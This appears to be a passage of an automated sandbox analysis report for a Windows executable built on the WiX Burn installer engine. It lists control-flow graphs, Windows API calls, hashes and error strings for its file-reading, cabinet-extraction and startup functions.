                                                                                                                                                                                                                                                                                                  control_flow_graph 174 5cb48b-5cb500 call 5ef8e0 * 2 179 5cb538-5cb53e 174->179 180 5cb502-5cb50c GetLastError 174->180 183 5cb540 179->183 184 5cb542-5cb554 SetFilePointerEx 179->184 181 5cb50e-5cb517 180->181 182 5cb519 180->182 181->182 187 5cb51b 182->187 188 5cb520-5cb52d call 5c3821 182->188 183->184 185 5cb588-5cb5a2 ReadFile 184->185 186 5cb556-5cb560 GetLastError 184->186 191 5cb5d9-5cb5e0 185->191 192 5cb5a4-5cb5ae GetLastError 185->192 189 5cb56d 186->189 190 5cb562-5cb56b 186->190 187->188 205 5cb532-5cb533 188->205 196 5cb56f 189->196 197 5cb574-5cb586 call 5c3821 189->197 190->189 194 5cb5e6-5cb5ef 191->194 195 5cbbd7-5cbbeb call 5c3821 191->195 198 5cb5bb 192->198 199 5cb5b0-5cb5b9 192->199 194->195 201 5cb5f5-5cb605 SetFilePointerEx 194->201 213 5cbbf0 195->213 196->197 197->205 203 5cb5bd 198->203 204 5cb5c2-5cb5d4 call 5c3821 198->204 199->198 207 5cb63c-5cb654 ReadFile 201->207 208 5cb607-5cb611 GetLastError 201->208 203->204 204->205 211 5cbbf1-5cbbf7 call 600237 205->211 217 5cb68b-5cb692 207->217 218 5cb656-5cb660 GetLastError 207->218 215 5cb61e 208->215 216 5cb613-5cb61c 208->216 227 5cbbf8-5cbc0a call 5ee06f 211->227 213->211 223 5cb625-5cb632 call 5c3821 215->223 224 5cb620 215->224 216->215 221 5cbbbc-5cbbd5 call 5c3821 217->221 222 5cb698-5cb6a2 217->222 225 5cb66d 218->225 226 5cb662-5cb66b 218->226 221->213 222->221 228 5cb6a8-5cb6cb SetFilePointerEx 222->228 223->207 224->223 231 5cb66f 225->231 232 5cb674-5cb681 call 5c3821 225->232 226->225 235 5cb6cd-5cb6d7 GetLastError 228->235 236 5cb702-5cb71a ReadFile 228->236 231->232 232->217 241 5cb6d9-5cb6e2 235->241 242 5cb6e4 235->242 243 5cb71c-5cb726 GetLastError 236->243 244 5cb751-5cb769 ReadFile 236->244 241->242 249 5cb6eb-5cb6f8 call 5c3821 242->249 250 5cb6e6 242->250 245 5cb728-5cb731 243->245 246 5cb733 243->246 247 5cb76b-5cb775 GetLastError 244->247 248 5cb7a0-5cb7bb SetFilePointerEx 244->248 245->246 253 5cb73a-5cb747 call 5c3821 246->253 254 5cb735 246->254 255 5cb777-5cb780 247->255 256 5cb782 247->256 251 5cb7bd-5cb7c7 GetLastError 248->251 252 5cb7f5-5cb814 ReadFile 248->252 249->236 250->249 258 5cb7c9-5cb7d2 251->258 259 5cb7d4 251->259 261 5cbb7d-5cbb87 GetLastError 252->261 262 5cb81a-5cb81c 252->262 253->244 254->253 255->256 263 5cb789-5cb796 call 5c3821 256->263 264 5cb784 256->264 258->259 268 5cb7db-5cb7eb call 5c3821 259->268 269 5cb7d6 259->269 266 5cbb89-5cbb92 261->266 267 5cbb94 261->267 271 5cb81d-5cb824 262->271 263->248 264->263 266->267 273 5cbb9b-5cbbb1 call 5c3821 267->273 274 5cbb96 267->274 268->252 269->268 276 5cbb58-5cbb75 call 5c3821 271->276 277 5cb82a-5cb836 271->277 293 5cbbb2-5cbbba call 600237 273->293 274->273 294 5cbb7a-5cbb7b 276->294 282 5cb838-5cb83f 277->282 283 5cb841-5cb84a 277->283 282->283 286 5cb884-5cb88b 282->286 287 5cbb1b-5cbb32 call 5c3821 283->287 288 5cb850-5cb876 ReadFile 283->288 290 5cb88d-5cb8af call 5c3821 286->290 291 5cb8b4-5cb8cb call 5c394f 286->291 300 5cbb37-5cbb3d call 600237 287->300 288->261 289 5cb87c-5cb882 288->289 289->271 290->294 304 5cb8cd-5cb8ea call 5c3821 291->304 305 5cb8ef-5cb904 SetFilePointerEx 291->305 293->227 294->293 310 5cbb43-5cbb44 300->310 304->211 308 5cb944-5cb969 ReadFile 305->308 309 5cb906-5cb910 GetLastError 305->309 311 5cb96b-5cb975 GetLastError 308->311 312 5cb9a0-5cb9ac 308->312 314 5cb91d 309->314 315 5cb912-5cb91b 309->315 316 5cbb45-5cbb47 310->316 317 5cb977-5cb980 311->317 318 5cb982 311->318 319 5cb9ae-5cb9ca call 5c3821 312->319 320 5cb9cf-5cb9d3 312->320 321 5cb91f 314->321 322 5cb924-5cb934 call 5c3821 314->322 315->314 316->227 327 5cbb4d-5cbb53 call 5c3a16 316->327 317->318 328 5cb989-5cb99e call 5c3821 318->328 329 5cb984 318->329 319->300 325 5cba0e-5cba21 call 604a05 320->325 326 5cb9d5-5cba09 call 5c3821 call 600237 320->326 321->322 336 5cb939-5cb93f call 600237 322->336 343 5cba2d-5cba37 325->343 344 5cba23-5cba28 325->344 326->316 327->227 328->336 329->328 336->310 347 5cba39-5cba3f 343->347 348 5cba41-5cba49 343->348 344->336 349 5cba5a-5cbaba call 5c394f 347->349 350 5cba4b-5cba53 348->350 351 5cba55-5cba58 348->351 354 5cbabc-5cbad8 call 5c3821 349->354 355 5cbade-5cbaff call 5ef360 call 5cb208 349->355 350->349 351->349 354->355 355->316 362 5cbb01-5cbb11 call 5c3821 355->362 362->287
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB502
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB556
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,aD\H,00000040,?,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB59E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 005CB5A4
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB601
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB650
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB656
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB6C7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB6CD
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB716
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB71C
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB765
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB76B
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB7B7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB7BD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB810
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB872
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB8FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 005CB906
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aD\H$burn$section.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3411815225-3353476469
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf7f419e358a79547cd69df66a483272cf6646aeec79dcc046f2388b6a27e387
                                                                                                                                                                                                                                                                                                  • Instruction ID: 278f3eefc793753c51ce9ca3c8a2db0ae80d302f30590ee75176f13c5b188130
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf7f419e358a79547cd69df66a483272cf6646aeec79dcc046f2388b6a27e387
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C12E77698023AAFEB349A94CC46FAB7EA5FB44710F11469DFD04BB281E7719D408BD0
                                                                                                                                                                                                                                                                                                  Function 005E0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 365 5e0d16-5e0d2d SetEvent 366 5e0d6f-5e0d7d WaitForSingleObject 365->366 367 5e0d2f-5e0d39 GetLastError 365->367 368 5e0d7f-5e0d89 GetLastError 366->368 369 5e0db4-5e0dbf ResetEvent 366->369 370 5e0d3b-5e0d44 367->370 371 5e0d46 367->371 372 5e0d8b-5e0d94 368->372 373 5e0d96 368->373 374 5e0df9-5e0dff 369->374 375 5e0dc1-5e0dcb GetLastError 369->375 370->371 376 5e0d4d-5e0d5d call 5c3821 371->376 377 5e0d48 371->377 372->373 381 5e0d9d-5e0db2 call 5c3821 373->381 382 5e0d98 373->382 379 5e0e32-5e0e4b call 5c21ac 374->379 380 5e0e01-5e0e04 374->380 383 5e0dcd-5e0dd6 375->383 384 5e0dd8 375->384 392 5e0d62-5e0d6a call 600237 376->392 377->376 401 5e0e4d-5e0e5e call 600237 379->401 402 5e0e63-5e0e6e SetEvent 379->402 388 5e0e28-5e0e2d 380->388 389 5e0e06-5e0e23 call 5c3821 380->389 381->392 382->381 383->384 386 5e0ddf-5e0df4 call 5c3821 384->386 387 5e0dda 384->387 386->392 387->386 395 5e10e8-5e10ed 388->395 408 5e10de-5e10e4 call 600237 389->408 392->395 403 5e10ef 395->403 404 5e10f2-5e10f8 395->404 416 5e10e5-5e10e7 401->416 405 5e0ea8-5e0eb6 WaitForSingleObject 402->405 406 5e0e70-5e0e7a GetLastError 402->406 403->404 413 5e0eb8-5e0ec2 GetLastError 405->413 414 5e0ef0-5e0efb ResetEvent 405->414 411 5e0e7c-5e0e85 406->411 412 5e0e87 406->412 408->416 411->412 419 5e0e8e-5e0ea3 call 5c3821 412->419 420 5e0e89 412->420 421 5e0ecf 413->421 422 5e0ec4-5e0ecd 413->422 417 5e0efd-5e0f07 GetLastError 414->417 418 5e0f35-5e0f3c 414->418 416->395 424 5e0f09-5e0f12 417->424 425 5e0f14 417->425 427 5e0f3e-5e0f41 418->427 428 5e0fab-5e0fce CreateFileW 418->428 444 5e10dd 419->444 420->419 429 5e0ed6-5e0eeb call 5c3821 421->429 430 5e0ed1 421->430 422->421 424->425 431 5e0f1b-5e0f30 call 5c3821 425->431 432 5e0f16 425->432 436 5e0f6e-5e0f72 call 5c394f 427->436 437 5e0f43-5e0f46 427->437 434 5e100b-5e101f SetFilePointerEx 428->434 435 5e0fd0-5e0fda GetLastError 428->435 429->444 430->429 431->444 432->431 440 5e1059-5e1064 SetEndOfFile 434->440 441 5e1021-5e102b GetLastError 434->441 445 5e0fdc-5e0fe5 435->445 446 5e0fe7 435->446 451 5e0f77-5e0f7c 436->451 447 5e0f48-5e0f4b 437->447 448 5e0f67-5e0f69 437->448 453 5e109b-5e10a8 SetFilePointerEx 440->453 454 5e1066-5e1070 GetLastError 440->454 449 5e102d-5e1036 441->449 450 5e1038 441->450 444->408 445->446 455 5e0fee-5e1001 call 5c3821 446->455 456 5e0fe9 446->456 457 5e0f5d-5e0f62 447->457 458 5e0f4d-5e0f53 447->458 448->395 449->450 462 5e103f-5e1054 call 5c3821 450->462 463 5e103a 450->463 460 5e0f7e-5e0f98 call 5c3821 451->460 461 5e0f9d-5e0fa6 451->461 453->416 459 5e10aa-5e10b4 GetLastError 453->459 464 5e107d 454->464 465 5e1072-5e107b 454->465 455->434 456->455 457->416 458->457 467 5e10b6-5e10bf 459->467 468 5e10c1 459->468 460->444 461->416 462->444 463->462 471 5e107f 464->471 472 5e1084-5e1099 call 5c3821 464->472 465->464 467->468 474 5e10c8-5e10d8 call 5c3821 468->474 475 5e10c3 468->475 471->472 472->444 474->444 475->474
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,005E08BC,?,?), ref: 005E0D25
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0D2F
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,005E08BC,?,?), ref: 005E0D74
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0D7F
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,?,?,005E08BC,?,?), ref: 005E0DB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,005E08BC,?,?), ref: 005E0DC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1865021742-2104912459
                                                                                                                                                                                                                                                                                                  • Opcode ID: a328f9486b023f7bec596158ecf59e7b1754dc449fff28adb25bf35817c3c98b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95c6a90957e46611b7b3f37d795f61b154d10c4431ac4edc04b5adbea0068876
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a328f9486b023f7bec596158ecf59e7b1754dc449fff28adb25bf35817c3c98b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 949149379C26B367D73916E64D0DF6B2D52BF00B20F129624BE91BE6D0D3A1DC8082D5
                                                                                                                                                                                                                                                                                                  Function 005C5195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 587 5c5195-5c5243 call 5ef8e0 * 2 GetModuleHandleW call 6004f8 call 6006ae call 5c120a 598 5c5259-5c526a call 5c42d7 587->598 599 5c5245 587->599 604 5c526c-5c5271 598->604 605 5c5273-5c528f call 5c5618 CoInitializeEx 598->605 600 5c524a-5c5254 call 600237 599->600 608 5c54d4-5c54db 600->608 604->600 615 5c5298-5c52a4 call 5ffcae 605->615 616 5c5291-5c5296 605->616 610 5c54dd-5c54e3 call 605636 608->610 611 5c54e8-5c54ea 608->611 610->611 613 5c54ec-5c54f3 611->613 614 5c54fa-5c5518 call 5cd82f call 5da8d6 call 5dab24 611->614 613->614 617 5c54f5 call 5d41ec 613->617 637 5c551a-5c5522 614->637 638 5c5546-5c5559 call 5c4fa4 614->638 624 5c52b8-5c52c7 call 600e07 615->624 625 5c52a6 615->625 616->600 617->614 634 5c52c9-5c52ce 624->634 635 5c52d0-5c52df call 602af7 624->635 627 5c52ab-5c52b3 call 600237 625->627 627->608 634->627 642 5c52e8-5c52f7 call 603565 635->642 643 5c52e1-5c52e6 635->643 637->638 641 5c5524-5c5527 637->641 647 5c555b call 603a35 638->647 648 5c5560-5c5567 638->648 641->638 645 5c5529-5c5544 call 5d434c call 5c5602 641->645 656 5c52f9-5c52fe 642->656 657 5c5300-5c531f GetVersionExW 642->657 643->627 645->638 647->648 653 5c556e-5c5575 648->653 654 5c5569 call 602efe 648->654 659 5c557c-5c5583 653->659 660 5c5577 call 601479 653->660 654->653 656->627 662 5c5359-5c539e call 5c33c7 call 5c5602 657->662 663 5c5321-5c532b GetLastError 657->663 665 5c558a-5c558c 659->665 666 5c5585 call 5ffdbd 659->666 660->659 689 5c53a0-5c53ab call 605636 662->689 690 5c53b1-5c53c1 call 5d752a 662->690 671 5c532d-5c5336 663->671 672 5c5338 663->672 669 5c558e CoUninitialize 665->669 670 5c5594-5c559b 665->670 666->665 669->670 674 5c559d-5c559f 670->674 675 5c55d6-5c55df call 600113 670->675 671->672 676 5c533f-5c5354 call 5c3821 672->676 677 5c533a 672->677 680 5c55a5-5c55ab 674->680 681 5c55a1-5c55a3 674->681 687 5c55e6-5c55ff call 600802 call 5ee06f 675->687 688 5c55e1 call 5c45ee 675->688 676->627 677->676 685 5c55ad-5c55c6 call 5d3d85 call 5c5602 680->685 681->685 685->675 706 5c55c8-5c55d5 call 5c5602 685->706 688->687 689->690 702 5c53cd-5c53d6 690->702 703 5c53c3 690->703 707 5c53dc-5c53df 702->707 708 5c549e-5c54b4 call 5c4d39 702->708 703->702 706->675 711 5c53e5-5c53e8 707->711 712 5c5476-5c5489 call 5c4ae5 707->712 721 5c54b6 708->721 722 5c54c0-5c54d2 708->722 713 5c544e-5c546a call 5c48ef 711->713 714 5c53ea-5c53ed 711->714 720 5c548e-5c5492 712->720 713->722 729 5c546c 713->729 718 5c53ef-5c53f2 714->718 719 5c5426-5c5442 call 5c4a88 714->719 725 5c53f4-5c53f9 718->725 726 5c5403-5c5416 call 5c4c86 718->726 719->722 733 5c5444 719->733 720->722 727 5c5494 720->727 721->722 722->608 725->726 726->722 734 5c541c 726->734 727->708 729->712 733->713 734->719
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 005C5217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006004F8: InitializeCriticalSection.KERNEL32(0062B5FC,?,005C5223,00000000,?,?,?,?,?,?), ref: 0060050F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,005C523F,00000000,?), ref: 005C1248
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C120A: GetLastError.KERNEL32(?,?,?,005C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 005C1252
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 005C5285
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00600E28
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 005C5317
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005C5321
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C558E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 005C5345
                                                                                                                                                                                                                                                                                                  • Failed to run per-user mode., xrefs: 005C5494
                                                                                                                                                                                                                                                                                                  • Failed to initialize Regutil., xrefs: 005C52C9
                                                                                                                                                                                                                                                                                                  • Failed to get OS info., xrefs: 005C534F
                                                                                                                                                                                                                                                                                                  • Failed to run untrusted mode., xrefs: 005C54B6
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 005C5245
                                                                                                                                                                                                                                                                                                  • Failed to run RunOnce mode., xrefs: 005C541C
                                                                                                                                                                                                                                                                                                  • Failed to run embedded mode., xrefs: 005C5444
                                                                                                                                                                                                                                                                                                  • Invalid run mode., xrefs: 005C53F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize core., xrefs: 005C53C3
                                                                                                                                                                                                                                                                                                  • Failed to run per-machine mode., xrefs: 005C546C
                                                                                                                                                                                                                                                                                                  • Failed to initialize engine state., xrefs: 005C526C
                                                                                                                                                                                                                                                                                                  • Failed to initialize Wiutil., xrefs: 005C52E1
                                                                                                                                                                                                                                                                                                  • Failed to initialize Cryputil., xrefs: 005C52A6
                                                                                                                                                                                                                                                                                                  • Failed to initialize XML util., xrefs: 005C52F9
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 005C5291
                                                                                                                                                                                                                                                                                                  • 3.11.1.2318, xrefs: 005C5384
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                                                                                                                                                  • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3262001429-510904028
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c9c86c977a5c7244391f4f9b1592fa6952934719728173ae9316093a7d08a6b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 464ae3148c8d93a408f18442a6c178be5b626933b1583f686235e2341efbe15c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c9c86c977a5c7244391f4f9b1592fa6952934719728173ae9316093a7d08a6b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99B19571D806299FDB359AE4CC46FEE7AA5BF44710F01419DE908A6281EB70AEC0CF91
                                                                                                                                                                                                                                                                                                  Function 005D752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 735 5d752a-5d756f call 5ef8e0 call 5c762c 740 5d757b-5d758c call 5cc407 735->740 741 5d7571-5d7576 735->741 747 5d758e-5d7593 740->747 748 5d7598-5d75a9 call 5cc26e 740->748 742 5d7814-5d781b call 600237 741->742 749 5d781c-5d7821 742->749 747->742 754 5d75ab-5d75b0 748->754 755 5d75b5-5d75ca call 5cc4c8 748->755 752 5d7829-5d782d 749->752 753 5d7823-5d7824 call 605636 749->753 757 5d782f-5d7832 call 605636 752->757 758 5d7837-5d783c 752->758 753->752 754->742 767 5d75cc-5d75d1 755->767 768 5d75d6-5d75e6 call 5ec001 755->768 757->758 759 5d783e-5d783f call 605636 758->759 760 5d7844-5d7851 call 5cc1bb 758->760 759->760 769 5d785b-5d785f 760->769 770 5d7853-5d7856 call 605636 760->770 767->742 776 5d75e8-5d75ed 768->776 777 5d75f2-5d7665 call 5d5c33 768->777 774 5d7869-5d786d 769->774 775 5d7861-5d7864 call 605636 769->775 770->769 779 5d786f-5d7872 call 5c3a16 774->779 780 5d7877-5d787f 774->780 775->774 776->742 784 5d7667-5d766c 777->784 785 5d7671-5d7676 777->785 779->780 784->742 786 5d767d-5d76b4 call 5c5602 GetCurrentProcess call 600879 call 5c827b 785->786 787 5d7678 785->787 794 5d76ce-5d76e5 call 5c827b 786->794 795 5d76b6 786->795 787->786 801 5d76ee-5d76f3 794->801 802 5d76e7-5d76ec 794->802 796 5d76bb-5d76c9 call 600237 795->796 796->749 803 5d774f-5d7754 801->803 804 5d76f5-5d7707 call 5c821f 801->804 802->796 806 5d7774-5d777d 803->806 807 5d7756-5d7768 call 5c821f 803->807 812 5d7709-5d770e 804->812 813 5d7713-5d7723 call 5c3436 804->813 809 5d777f-5d7782 806->809 810 5d7789-5d779d call 5da50c 806->810 807->806 817 5d776a-5d776f 807->817 809->810 814 5d7784-5d7787 809->814 822 5d779f-5d77a4 810->822 823 5d77a6 810->823 812->742 826 5d772f-5d7743 call 5c821f 813->826 827 5d7725-5d772a 813->827 814->810 818 5d77ac-5d77af 814->818 817->742 824 5d77b6-5d77cc call 5cd5a0 818->824 825 5d77b1-5d77b4 